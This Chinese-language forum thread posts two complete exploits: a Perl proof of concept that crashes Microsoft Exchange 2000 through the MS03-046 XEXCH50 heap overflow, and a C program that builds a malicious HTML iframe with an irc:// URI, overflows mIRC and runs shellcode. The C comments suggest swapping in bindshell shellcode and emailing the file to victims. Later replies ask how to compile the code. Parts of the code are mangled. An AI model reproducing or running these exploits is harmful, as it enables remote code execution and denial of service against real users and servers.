公布两个最新漏洞＋溢出代码

沉睡不醒

Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)

#!/usr/bin/perl -w
##################
# ms03-046.pl
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.
# minor bugfix: look for 354 Send binary data
# by maple change

use strict;
use IO::Socket;

my $host = shift() ││ usage();
my $mode = shift() ││ \"CHECK\";
my $port = 25;


if (uc($mode) eq \"CHECK\") { check() }
if (uc($mode) eq \"CRASH\") { crash() }

usage();


sub check
{
my $s = SMTP($host, $port);
if (! $s)
{
print \"
Error establishing connection to SMTP service.\n\";
exit(0);
}

print $s \"XEXCH50 2 2\r\n\";
my $res = <$s>;
close ($s);

# a patched server only allows XEXCH50 after NTLM authentication
if ($res !~ /354 Send binary/i)
{
print \"
This server has been patched or is not vulnerable.\n\";
exit(0);
}

print \"
This system is vulnerable: $hostport\n\";

exit(0);
}


sub crash
{
my $s = SMTP($host, $port);
if (! $s)
{
print \"
Error establishing connection to SMTP service.\n\";
exit(0);
}

# the negative value allows us to overwrite random heap bits
print $s \"XEXCH50 -1 2\r\n\";
my $res = <$s>;

# a patched server only allows XEXCH50 after NTLM authentication
if ($res !~ /354 Send binary/i)
{
print \"
This server has been patched or is not vulnerable.\n\";
exit(0);
}

print \"
Sending massive heap-smashing string...\n\";
print $s (\"META\" x 16384);

# sometimes a second connection is required to trigger the crash
$s = SMTP($host, $port);

exit(0);
}


sub usage
{
print STDERR \"Usage: $0 <host> [CHECK│CRASH]\n\";
exit(0);

}

sub SMTP
{
my ($host, $port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $host,
PeerPort => $port,
Proto => \"tcp\"
) ││ return(undef);

my $r = <$s>;
return undef if !$r;

if ($r !~ /Microsoft/)
{
chomp($r);
print STDERR \"
This does not look like an exchange server: $r\n\";
return(undef);
}

print $s \"HELO X\r\n\";
$r = <$s>;
return undef if !$r;

print $s \"MAIL WROM: TTZRCLBDX
$r = <$s>;
return undef if !$r;

print $s \"RCPT TO: Administrator\r\n\";
$r = <$s>;
return undef if !$r;

return($s);
}

沉睡不醒

mIRC v6.1 \\\"IRC\\\" protocol Remote Buffer overflow Exploit



/** remote mirc < 6.11 exploit by maple change

**

** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148

**

** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised

** nobody had written an exploit yet. So I decided to start writing one.

** Since this was my first time coding a exploit for windows, it took some

** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw )

**

** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-

** overflow, and when more then 998 bytes are given EIP will be overwritten.

**

** At first I was thinking of a simple solution to get this exploitable. Since

** giving an URI with > 998 chars to someone on IRC is simply NOT done

** Then I remember the iframe-irc:// flaw found by uuuppzz [2]

**

** This exploit will write an malicious HTML file containing an iframe executing the

** irc:// address. So you can give this to anyone on IRC for example

** The shellcode included does only execute cmd.exe, because I don\'t want to be this

** a scriptkiddy util. But, replacing the shellcode with your own is also possible.

** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require

** some tweaking.

** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez

**

** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn\'t started.

** mIRC will start automatically when an irc:// is executed, so you can also send somebody

** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express )

** :-)

**/



#include <stdio.h>





/* Stupid cmd.exe exec shellcode. hey! I r !evil */

unsigned char shellcode[] =

　　　\\\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\\"

　　　\\\"\\x8b\\xec\\x55\\x8b\\xec\\x68\\x65\\x78\\x65\\x20\\x68\\x63\\x6d\\x64\\x2e\\x8d\\x45\\xf8\\x50\\xb8\\\"

　　　\\\"\\x44\\x80\\xbf\\x77\\\"　　　　　　　　　//　　　0x78bf8044 <- adress of system()

　　　\\\"\\xff\\xd0\\\";　　　　　　　　　　　　// 　　　call system()

　　　



char jmpback[] =

\\\"\\xE9\\xCF\\xFB\\xFF\\xFF\\\"; // my leet negative JMP shellcode



char buffer[1100], fstring[1300]; // heh, need to clean this up



int main(int argc, char *argv[]) {

　　　FILE *evil;



　　　fprintf(stdout, \\\"---------------------------------------------\\n\\\"

　　　　　　　　　\\\"mIRC < 6.11 remote exploit by maple change\\n\\\"

\\\"Exploit downloaded on 21resource.com\\n\\\"

　　　　　　　　　\\\"---------------------------------------------\\n\\n\\\");



　　　// NOPslides are cool

　　　memset(buffer, 0x90, sizeof(buffer) - 1);



　　　// place shellcode in buffer

　　　memcpy(buffer + 20, shellcode, strlen(shellcode));



　　　// took this one from ntdll.dll (jmp esp)

　　　*(long *)&buffer[994] = 0x77F4801C;



　　　// place jmpback shellcode in buffer

　　　memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));



　　　printf(\\\"[+] Evil buffer constructed\\n\\\");





　　　// open HTML file for writing

　　　if((evil = fopen(\\\"index.html\\\", \\\"a+\\\")) != NULL) {



　　　　　　// construct evil string

　　　　　　sprintf(fstring, \\\"<iframe src=\\\\\"irc://%s\\\\\"></iframe>\\\", buffer);



　　　　　　// write string to file

　　　　　　fputs(fstring, evil);



　　　　　　// close file

　　　　　　fclose(evil);



　　　　　　printf(\\\"[+] Evil HTML file written!\\n\\\");

　　　　　　return(0);

　　　} else {

　　　　　　// uh oh.. :/

　　　　　　fprintf(stderr, \\\"ERROR: Could not open index.html for writing!\\n\\\");

　　　　　　exit(1);

　　　}

}

网路游侠

[emb7]

adidas

编程俺可不行~，有现成工具吗？

[em13]

沉睡不醒

自己拿回去编译，想吃白食可学不到东西哦

网路游侠

下一个ActivePerl就可以了。^_^

adidas

已经发现了~~





[emb2][emb2]

群子

问一下  那个乱七八糟的东西 是用什么东西编译啊？？



偶不会  教偶哦[emb12][emb12][emb13]

haiwanxue

谁作件好事，编译一下吧。

群子

偶不会编译 有谁帮我啊！！